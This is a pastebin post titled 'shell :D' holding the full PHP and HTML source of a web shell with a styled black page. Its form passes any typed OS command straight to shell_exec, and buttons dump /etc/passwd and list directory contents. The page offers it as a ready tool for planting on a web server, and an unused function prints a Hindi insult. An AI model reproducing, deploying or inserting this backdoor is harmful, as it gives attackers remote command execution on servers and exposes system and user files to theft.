shell :D


SUBMITTED BY: Guest

DATE: Dec. 2, 2013, 12:10 p.m.

FORMAT: PHP

SIZE: 4.1 kB

HITS: 936

  1. <body bgcolor="black">
  2. <div class="pic1"> </div>
  3. <div class="aaa">
  4. <div class = "pic3" >
  5. <div class = "pic3" >
  6. <div class = "pic3" >
  7. <div class = "pic3" > </div>
  8. </div>
  9. </div>
  10. </div>
  11. </div>
  12. <center>
  13. <div class="pic2"> </div>
  14. <br>
  15. <form method="post" class="b2all" >
  16. <input type="submit" class="buttonmenu" value="Get etc/password" name="etcpasswd">
  17. <input type="submit" class="buttonmenu" value="Show Files" name="dir1">
  18. </form>
  19. <form method="post" >
  20. Commands <input type="text" name="txt1" placeholder="Put Any OS Command" class="text1"><br>
  21. <input type="submit" value="Click" class="b" name="submit" >
  22. </form>
  23. <?php
  24. if(isset($_POST['submit']))
  25. {
  26. $a=$_POST['txt1'];
  27. $output = shell_exec("$a");
  28. echo "<textarea > $output </textarea>";
  29. }
  30. ?>
  31. <?php
  32. function etcpasswd()
  33. {
  34. $output = shell_exec("cat /etc/passwd");
  35. echo "<textarea > $output </textarea>";
  36. }
  37. if(isset($_POST['etcpasswd']))
  38. {
  39. etcpasswd();
  40. }
  41. function dir1()
  42. {
  43. $output = shell_exec("dir");
  44. echo "<textarea > $output </textarea>";
  45. }
  46. if(isset($_POST['dir1']))
  47. {
  48. dir1();
  49. }
  50. function demo()
  51. {
  52. echo "<h1> aap chutiya ha </h1>";
  53. }
  54. ?>
  55. <br />
  56. <br />
  57. <b> <font color="white"> Proudly Powered By <a href="http://www.mithaiwalidukan.in"> Mithai Wali Dukan </a> </font></b>
  58. </center>
  59. <style>
  60. .text1
  61. {
  62. color:#060;
  63. font-family:Arial, Helvetica, sans-serif;
  64. font-size:20px;
  65. font-weight: bold;
  66. border-radius:4px;
  67. }
  68. textarea
  69. {
  70. color:#060;
  71. height:530px;
  72. width:800px;
  73. border:#003366 medium double ;
  74. border-width:20px;
  75. border-radius:5px;
  76. }
  77. textarea:hover
  78. {
  79. color:#060;
  80. height:530px;
  81. width:800px;
  82. border:#003366 medium double ;
  83. border-width:20px;
  84. box-shadow:0px 0px 40px #006600;
  85. border-radius:5px;
  86. }
  87. .b
  88. {
  89. height:35px;
  90. width:80px;
  91. background-color:green;
  92. display:inline-block;
  93. margin-left:60px;
  94. margin-top:10px;
  95. border-radius:10px;
  96. }
  97. .b:hover
  98. {
  99. height:35px;
  100. width:80px;
  101. background-color:green;
  102. box-shadow:0px 0px 40px #006600;
  103. display:inline-block;
  104. border-radius:10px;
  105. }
  106. .pic3
  107. {
  108. background-image:url(http://s12.postimg.org/unvpx414p/Untitled_4.gif);
  109. height:90;
  110. width:100;
  111. background-size:cover;
  112. transition:width 2s, height 2s, transform 2s;
  113. -webkit-transition:width 2s, height 2s, -webkit-transform 2s;
  114. }
  115. .pic3:hover
  116. {
  117. background-image:url(http://s12.postimg.org/unvpx414p/Untitled_4.gif);
  118. height:90;
  119. width:100;
  120. background-size:cover;
  121. transform:rotate(360deg);
  122. -webkit-transform:rotate(360deg);
  123. }
  124. .pic2
  125. {
  126. background-image:url(http://s10.postimg.org/xpzqhm79h/Unt.gif);
  127. height:112;
  128. width:120;
  129. margin-left:950px;
  130. position:absolute;
  131. background-size:contain;
  132. margin-top:70px;
  133. }
  134. .pic1
  135. {
  136. background-image:url(http://s21.postimg.org/563r7v8g3/supertux.gif);
  137. height:102;
  138. width:120;
  139. margin-left:10px;
  140. position:absolute;
  141. margin-top:1px;
  142. }
  143. a:link {color:red;}
  144. a:visited {color:#060;}
  145. a:hover {color:#F00;}
  146. a:active {color:white;}
  147. a{text-decoration: none;}
  148. .aaa
  149. {
  150. margin-left:650px;
  151. }
  152. .b2all
  153. {
  154. display:inline-block;
  155. }
  156. .buttonmenu
  157. {
  158. background-color:green;
  159. height:27px;
  160. border-radius:10px;
  161. font-weight: bold;
  162. color:white;
  163. }
  164. </style>
  165. </body>

comments powered by Disqus